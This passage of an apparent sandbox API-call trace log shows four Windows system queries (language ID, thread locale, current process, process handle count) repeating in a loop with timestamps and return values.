0x26d0409 [0166.597] GetThreadLocale () returned 0x409 [0166.597] GetCurrentProcess () returned 0xffffffff [0166.597] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.597] GetSystemDefaultLangID () returned 0x26d0409 [0166.597] GetThreadLocale () returned 0x409 [0166.597] GetCurrentProcess () returned 0xffffffff [0166.597] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.597] GetSystemDefaultLangID () returned 0x26d0409 [0166.597] GetThreadLocale () returned 0x409 [0166.597] GetCurrentProcess () returned 0xffffffff [0166.597] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.597] GetSystemDefaultLangID () returned 0x26d0409 [0166.597] GetThreadLocale () returned 0x409 [0166.597] GetCurrentProcess () returned 0xffffffff [0166.597] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.597] GetSystemDefaultLangID () returned 0x26d0409 [0166.597] GetThreadLocale () returned 0x409 [0166.597] GetCurrentProcess () returned 0xffffffff [0166.597] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.597] GetSystemDefaultLangID () returned 0x26d0409 [0166.597] GetThreadLocale () returned 0x409 [0166.597] GetCurrentProcess () returned 0xffffffff [0166.597] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.598] GetSystemDefaultLangID () returned 0x26d0409 [0166.598] GetThreadLocale () returned 0x409 [0166.598] GetCurrentProcess () returned 0xffffffff [0166.598] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.598] GetSystemDefaultLangID () returned 0x26d0409 [0166.598] GetThreadLocale () returned 0x409 [0166.598] GetCurrentProcess () returned 0xffffffff [0166.598] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.598] GetSystemDefaultLangID () returned 0x26d0409 [0166.598] GetThreadLocale () returned 0x409 [0166.598] GetCurrentProcess () returned 0xffffffff [0166.598] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.598] GetSystemDefaultLangID () returned 0x26d0409 [0166.598] GetThreadLocale () returned 0x409 [0166.598] GetCurrentProcess () returned 0xffffffff [0166.598] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.598] GetSystemDefaultLangID () returned 0x26d0409 [0166.598] GetThreadLocale () returned 0x409 [0166.598] GetCurrentProcess () returned 0xffffffff [0166.598] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.598] GetSystemDefaultLangID () returned 0x26d0409 [0166.598] GetThreadLocale () returned 0x409 [0166.598] GetCurrentProcess () returned 0xffffffff [0166.598] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.598] GetSystemDefaultLangID () returned 0x26d0409 [0166.599] GetThreadLocale () returned 0x409 [0166.599] GetCurrentProcess () returned 0xffffffff [0166.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.599] GetSystemDefaultLangID () returned 0x26d0409 [0166.599] GetThreadLocale () returned 0x409 [0166.599] GetCurrentProcess () returned 0xffffffff [0166.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.599] GetSystemDefaultLangID () returned 0x26d0409 [0166.599] GetThreadLocale () returned 0x409 [0166.599] GetCurrentProcess () returned 0xffffffff [0166.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.599] GetSystemDefaultLangID () returned 0x26d0409 [0166.599] GetThreadLocale () returned 0x409 [0166.599] GetCurrentProcess () returned 0xffffffff [0166.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.599] GetSystemDefaultLangID () returned 0x26d0409 [0166.599] GetThreadLocale () returned 0x409 [0166.599] GetCurrentProcess () returned 0xffffffff [0166.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.599] GetSystemDefaultLangID () returned 0x26d0409 [0166.599] GetThreadLocale () returned 0x409 [0166.599] GetCurrentProcess () returned 0xffffffff [0166.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.599] GetSystemDefaultLangID () returned 0x26d0409 [0166.599] GetThreadLocale () returned 0x409 [0166.600] GetCurrentProcess () returned 0xffffffff [0166.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.600] GetSystemDefaultLangID () returned 0x26d0409 [0166.600] GetThreadLocale () returned 0x409 [0166.600] GetCurrentProcess () returned 0xffffffff [0166.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.600] GetSystemDefaultLangID () returned 0x26d0409 [0166.600] GetThreadLocale () returned 0x409 [0166.600] GetCurrentProcess () returned 0xffffffff [0166.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.600] GetSystemDefaultLangID () returned 0x26d0409 [0166.600] GetThreadLocale () returned 0x409 [0166.600] GetCurrentProcess () returned 0xffffffff [0166.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.600] GetSystemDefaultLangID () returned 0x26d0409 [0166.600] GetThreadLocale () returned 0x409 [0166.600] GetCurrentProcess () returned 0xffffffff [0166.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.600] GetSystemDefaultLangID () returned 0x26d0409 [0166.600] GetThreadLocale () returned 0x409 [0166.600] GetCurrentProcess () returned 0xffffffff [0166.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.600] GetSystemDefaultLangID () returned 0x26d0409 [0166.600] GetThreadLocale () returned 0x409 [0166.600] GetCurrentProcess () returned 0xffffffff [0166.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.601] GetSystemDefaultLangID () returned 0x26d0409 [0166.601] GetThreadLocale () returned 0x409 [0166.601] GetCurrentProcess () returned 0xffffffff [0166.601] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.601] GetSystemDefaultLangID () returned 0x26d0409 [0166.601] GetThreadLocale () returned 0x409 [0166.601] GetCurrentProcess () returned 0xffffffff [0166.601] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.601] GetSystemDefaultLangID () returned 0x26d0409 [0166.601] GetThreadLocale () returned 0x409 [0166.601] GetCurrentProcess () returned 0xffffffff [0166.601] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.601] GetSystemDefaultLangID () returned 0x26d0409 [0166.601] GetThreadLocale () returned 0x409 [0166.601] GetCurrentProcess () returned 0xffffffff [0166.601] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.601] GetSystemDefaultLangID () returned 0x26d0409 [0166.601] GetThreadLocale () returned 0x409 [0166.601] GetCurrentProcess () returned 0xffffffff [0166.601] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.601] GetSystemDefaultLangID () returned 0x26d0409 [0166.601] GetThreadLocale () returned 0x409 [0166.601] GetCurrentProcess () returned 0xffffffff [0166.601] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.601] GetSystemDefaultLangID () returned 0x26d0409 [0166.602] GetThreadLocale () returned 0x409 [0166.602] GetCurrentProcess () returned 0xffffffff [0166.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.602] GetSystemDefaultLangID () returned 0x26d0409 [0166.602] GetThreadLocale () returned 0x409 [0166.602] GetCurrentProcess () returned 0xffffffff [0166.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.602] GetSystemDefaultLangID () returned 0x26d0409 [0166.602] GetThreadLocale () returned 0x409 [0166.602] GetCurrentProcess () returned 0xffffffff [0166.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.602] GetSystemDefaultLangID () returned 0x26d0409 [0166.602] GetThreadLocale () returned 0x409 [0166.602] GetCurrentProcess () returned 0xffffffff [0166.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.602] GetSystemDefaultLangID () returned 0x26d0409 [0166.602] GetThreadLocale () returned 0x409 [0166.602] GetCurrentProcess () returned 0xffffffff [0166.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.602] GetSystemDefaultLangID () returned 0x26d0409 [0166.602] GetThreadLocale () returned 0x409 [0166.602] GetCurrentProcess () returned 0xffffffff [0166.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.602] GetSystemDefaultLangID () returned 0x26d0409 [0166.602] GetThreadLocale () returned 0x409 [0166.602] GetCurrentProcess () returned 0xffffffff [0166.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.603] GetSystemDefaultLangID () returned 0x26d0409 [0166.603] GetThreadLocale () returned 0x409 [0166.603] GetCurrentProcess () returned 0xffffffff [0166.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.603] GetSystemDefaultLangID () returned 0x26d0409 [0166.603] GetThreadLocale () returned 0x409 [0166.603] GetCurrentProcess () returned 0xffffffff [0166.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.603] GetSystemDefaultLangID () returned 0x26d0409 [0166.603] GetThreadLocale () returned 0x409 [0166.603] GetCurrentProcess () returned 0xffffffff [0166.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.603] GetSystemDefaultLangID () returned 0x26d0409 [0166.603] GetThreadLocale () returned 0x409 [0166.603] GetCurrentProcess () returned 0xffffffff [0166.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.603] GetSystemDefaultLangID () returned 0x26d0409 [0166.603] GetThreadLocale () returned 0x409 [0166.603] GetCurrentProcess () returned 0xffffffff [0166.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.603] GetSystemDefaultLangID () returned 0x26d0409 [0166.603] GetThreadLocale () returned 0x409 [0166.603] GetCurrentProcess () returned 0xffffffff [0166.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.604] GetSystemDefaultLangID () returned 0x26d0409 [0166.604] GetThreadLocale () returned 0x409 [0166.604] GetCurrentProcess () returned 0xffffffff [0166.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.604] GetSystemDefaultLangID () returned 0x26d0409 [0166.604] GetThreadLocale () returned 0x409 [0166.604] GetCurrentProcess () returned 0xffffffff [0166.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.604] GetSystemDefaultLangID () returned 0x26d0409 [0166.604] GetThreadLocale () returned 0x409 [0166.604] GetCurrentProcess () returned 0xffffffff [0166.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.604] GetSystemDefaultLangID () returned 0x26d0409 [0166.604] GetThreadLocale () returned 0x409 [0166.604] GetCurrentProcess () returned 0xffffffff [0166.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.604] GetSystemDefaultLangID () returned 0x26d0409 [0166.604] GetThreadLocale () returned 0x409 [0166.604] GetCurrentProcess () returned 0xffffffff [0166.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.604] GetSystemDefaultLangID () returned 0x26d0409 [0166.604] GetThreadLocale () returned 0x409 [0166.604] GetCurrentProcess () returned 0xffffffff [0166.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.605] GetSystemDefaultLangID () returned 0x26d0409 [0166.605] GetThreadLocale () returned 0x409 [0166.605] GetCurrentProcess () returned 0xffffffff [0166.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.628] GetSystemDefaultLangID () returned 0x26d0409 [0166.628] GetThreadLocale () returned 0x409 [0166.629] GetCurrentProcess () returned 0xffffffff [0166.629] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.629] GetSystemDefaultLangID () returned 0x26d0409 [0166.629] GetThreadLocale () returned 0x409 [0166.629] GetCurrentProcess () returned 0xffffffff [0166.629] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.629] GetSystemDefaultLangID () returned 0x26d0409 [0166.629] GetThreadLocale () returned 0x409 [0166.629] GetCurrentProcess () returned 0xffffffff [0166.629] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.629] GetSystemDefaultLangID () returned 0x26d0409 [0166.629] GetThreadLocale () returned 0x409 [0166.629] GetCurrentProcess () returned 0xffffffff [0166.629] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.629] GetSystemDefaultLangID () returned 0x26d0409 [0166.629] GetThreadLocale () returned 0x409 [0166.629] GetCurrentProcess () returned 0xffffffff [0166.629] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.629] GetSystemDefaultLangID () returned 0x26d0409 [0166.629] GetThreadLocale () returned 0x409 [0166.629] GetCurrentProcess () returned 0xffffffff [0166.630] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.630] GetSystemDefaultLangID () returned 0x26d0409 [0166.630] GetThreadLocale () returned 0x409 [0166.630] GetCurrentProcess () returned 0xffffffff [0166.630] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.630] GetSystemDefaultLangID () returned 0x26d0409 [0166.630] GetThreadLocale () returned 0x409 [0166.630] GetCurrentProcess () returned 0xffffffff [0166.630] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.630] GetSystemDefaultLangID () returned 0x26d0409 [0166.630] GetThreadLocale () returned 0x409 [0166.630] GetCurrentProcess () returned 0xffffffff [0166.630] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.630] GetSystemDefaultLangID () returned 0x26d0409 [0166.630] GetThreadLocale () returned 0x409 [0166.630] GetCurrentProcess () returned 0xffffffff [0166.630] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.630] GetSystemDefaultLangID () returned 0x26d0409 [0166.630] GetThreadLocale () returned 0x409 [0166.630] GetCurrentProcess () returned 0xffffffff [0166.630] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.630] GetSystemDefaultLangID () returned 0x26d0409 [0166.630] GetThreadLocale () returned 0x409 [0166.630] GetCurrentProcess () returned 0xffffffff [0166.630] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.630] GetSystemDefaultLangID () returned 0x26d0409 [0166.630] GetThreadLocale () returned 0x409 [0166.630] GetCurrentProcess () returned 0xffffffff [0166.630] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.631] GetSystemDefaultLangID () returned 0x26d0409 [0166.631] GetThreadLocale () returned 0x409 [0166.631] GetCurrentProcess () returned 0xffffffff [0166.631] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.631] GetSystemDefaultLangID () returned 0x26d0409 [0166.631] GetThreadLocale () returned 0x409 [0166.631] GetCurrentProcess () returned 0xffffffff [0166.631] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.631] GetSystemDefaultLangID () returned 0x26d0409 [0166.631] GetThreadLocale () returned 0x409 [0166.631] GetCurrentProcess () returned 0xffffffff [0166.631] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.631] GetSystemDefaultLangID () returned 0x26d0409 [0166.631] GetThreadLocale () returned 0x409 [0166.631] GetCurrentProcess () returned 0xffffffff [0166.631] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.631] GetSystemDefaultLangID () returned 0x26d0409 [0166.631] GetThreadLocale () returned 0x409 [0166.631] GetCurrentProcess () returned 0xffffffff [0166.631] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.631] GetSystemDefaultLangID () returned 0x26d0409 [0166.631] GetThreadLocale () returned 0x409 [0166.631] GetCurrentProcess () returned 0xffffffff [0166.631] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.631] GetSystemDefaultLangID () returned 0x26d0409 [0166.631] GetThreadLocale () returned 0x409 [0166.631] GetCurrentProcess () returned 0xffffffff [0166.631] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.631] GetSystemDefaultLangID () returned 0x26d0409 [0166.631] GetThreadLocale () returned 0x409 [0166.631] GetCurrentProcess () returned 0xffffffff [0166.632] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.632] GetSystemDefaultLangID () returned 0x26d0409 [0166.632] GetThreadLocale () returned 0x409 [0166.632] GetCurrentProcess () returned 0xffffffff [0166.632] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.632] GetSystemDefaultLangID () returned 0x26d0409 [0166.632] GetThreadLocale () returned 0x409 [0166.632] GetCurrentProcess () returned 0xffffffff [0166.632] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.632] GetSystemDefaultLangID () returned 0x26d0409 [0166.632] GetThreadLocale () returned 0x409 [0166.632] GetCurrentProcess () returned 0xffffffff [0166.632] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.632] GetSystemDefaultLangID () returned 0x26d0409 [0166.632] GetThreadLocale () returned 0x409 [0166.632] GetCurrentProcess () returned 0xffffffff [0166.632] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.632] GetSystemDefaultLangID () returned 0x26d0409 [0166.632] GetThreadLocale () returned 0x409 [0166.632] GetCurrentProcess () returned 0xffffffff [0166.632] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.632] GetSystemDefaultLangID () returned 0x26d0409 [0166.632] GetThreadLocale () returned 0x409 [0166.632] GetCurrentProcess () returned 0xffffffff [0166.632] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.632] GetSystemDefaultLangID () returned 0x26d0409 [0166.632] GetThreadLocale () returned 0x409 [0166.632] GetCurrentProcess () returned 0xffffffff [0166.632] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.632] GetSystemDefaultLangID () returned 0x26d0409 [0166.633] GetThreadLocale () returned 0x409 [0166.633] GetCurrentProcess () returned 0xffffffff [0166.633] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.633] GetSystemDefaultLangID () returned 0x26d0409 [0166.633] GetThreadLocale () returned 0x409 [0166.633] GetCurrentProcess () returned 0xffffffff [0166.633] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.633] GetSystemDefaultLangID () returned 0x26d0409 [0166.633] GetThreadLocale () returned 0x409 [0166.633] GetCurrentProcess () returned 0xffffffff [0166.633] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.633] GetSystemDefaultLangID () returned 0x26d0409 [0166.633] GetThreadLocale () returned 0x409 [0166.633] GetCurrentProcess () returned 0xffffffff [0166.633] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.633] GetSystemDefaultLangID () returned 0x26d0409 [0166.633] GetThreadLocale () returned 0x409 [0166.633] GetCurrentProcess () returned 0xffffffff [0166.633] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.633] GetSystemDefaultLangID () returned 0x26d0409 [0166.633] GetThreadLocale () returned 0x409 [0166.633] GetCurrentProcess () returned 0xffffffff [0166.633] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.633] GetSystemDefaultLangID () returned 0x26d0409 [0166.633] GetThreadLocale () returned 0x409 [0166.633] GetCurrentProcess () returned 0xffffffff [0166.633] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.633] GetSystemDefaultLangID () returned 0x26d0409 [0166.633] GetThreadLocale () returned 0x409 [0166.633] GetCurrentProcess () returned 0xffffffff [0166.633] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.633] GetSystemDefaultLangID () returned 0x26d0409 [0166.633] GetThreadLocale () returned 0x409 [0166.634] GetCurrentProcess () returned 0xffffffff [0166.634] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.634] GetSystemDefaultLangID () returned 0x26d0409 [0166.634] GetThreadLocale () returned 0x409 [0166.634] GetCurrentProcess () returned 0xffffffff [0166.634] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.634] GetSystemDefaultLangID () returned 0x26d0409 [0166.634] GetThreadLocale () returned 0x409 [0166.634] GetCurrentProcess () returned 0xffffffff [0166.634] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.634] GetSystemDefaultLangID () returned 0x26d0409 [0166.634] GetThreadLocale () returned 0x409 [0166.634] GetCurrentProcess () returned 0xffffffff [0166.634] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.634] GetSystemDefaultLangID () returned 0x26d0409 [0166.634] GetThreadLocale () returned 0x409 [0166.634] GetCurrentProcess () returned 0xffffffff [0166.634] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.634] GetSystemDefaultLangID () returned 0x26d0409 [0166.634] GetThreadLocale () returned 0x409 [0166.634] GetCurrentProcess () returned 0xffffffff [0166.634] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.634] GetSystemDefaultLangID () returned 0x26d0409 [0166.634] GetThreadLocale () returned 0x409 [0166.634] GetCurrentProcess () returned 0xffffffff [0166.634] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.634] GetSystemDefaultLangID () returned 0x26d0409 [0166.634] GetThreadLocale () returned 0x409 [0166.634] GetCurrentProcess () returned 0xffffffff [0166.634] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.634] GetSystemDefaultLangID () returned 0x26d0409 [0166.634] GetThreadLocale () returned 0x409 [0166.635] GetCurrentProcess () returned 0xffffffff [0166.635] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.635] GetSystemDefaultLangID () returned 0x26d0409 [0166.635] GetThreadLocale () returned 0x409 [0166.635] GetCurrentProcess () returned 0xffffffff [0166.635] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.635] GetSystemDefaultLangID () returned 0x26d0409 [0166.635] GetThreadLocale () returned 0x409 [0166.635] GetCurrentProcess () returned 0xffffffff [0166.635] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.635] GetSystemDefaultLangID () returned 0x26d0409 [0166.635] GetThreadLocale () returned 0x409 [0166.635] GetCurrentProcess () returned 0xffffffff [0166.635] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.635] GetSystemDefaultLangID () returned 0x26d0409 [0166.635] GetThreadLocale () returned 0x409 [0166.635] GetCurrentProcess () returned 0xffffffff [0166.635] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.635] GetSystemDefaultLangID () returned 0x26d0409 [0166.635] GetThreadLocale () returned 0x409 [0166.635] GetCurrentProcess () returned 0xffffffff [0166.635] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.635] GetSystemDefaultLangID () returned 0x26d0409 [0166.635] GetThreadLocale () returned 0x409 [0166.635] GetCurrentProcess () returned 0xffffffff [0166.635] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.635] GetSystemDefaultLangID () returned 0x26d0409 [0166.635] GetThreadLocale () returned 0x409 [0166.635] GetCurrentProcess () returned 0xffffffff [0166.635] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.635] GetSystemDefaultLangID () returned 0x26d0409 [0166.635] GetThreadLocale () returned 0x409 [0166.636] GetCurrentProcess () returned 0xffffffff [0166.636] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.636] GetSystemDefaultLangID () returned 0x26d0409 [0166.636] GetThreadLocale () returned 0x409 [0166.636] GetCurrentProcess () returned 0xffffffff [0166.636] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.636] GetSystemDefaultLangID () returned 0x26d0409 [0166.636] GetThreadLocale () returned 0x409 [0166.636] GetCurrentProcess () returned 0xffffffff [0166.637] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.637] GetSystemDefaultLangID () returned 0x26d0409 [0166.637] GetThreadLocale () returned 0x409 [0166.637] GetCurrentProcess () returned 0xffffffff [0166.637] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.637] GetSystemDefaultLangID () returned 0x26d0409 [0166.637] GetThreadLocale () returned 0x409 [0166.637] GetCurrentProcess () returned 0xffffffff [0166.637] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.637] GetSystemDefaultLangID () returned 0x26d0409 [0166.637] GetThreadLocale () returned 0x409 [0166.637] GetCurrentProcess () returned 0xffffffff [0166.637] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 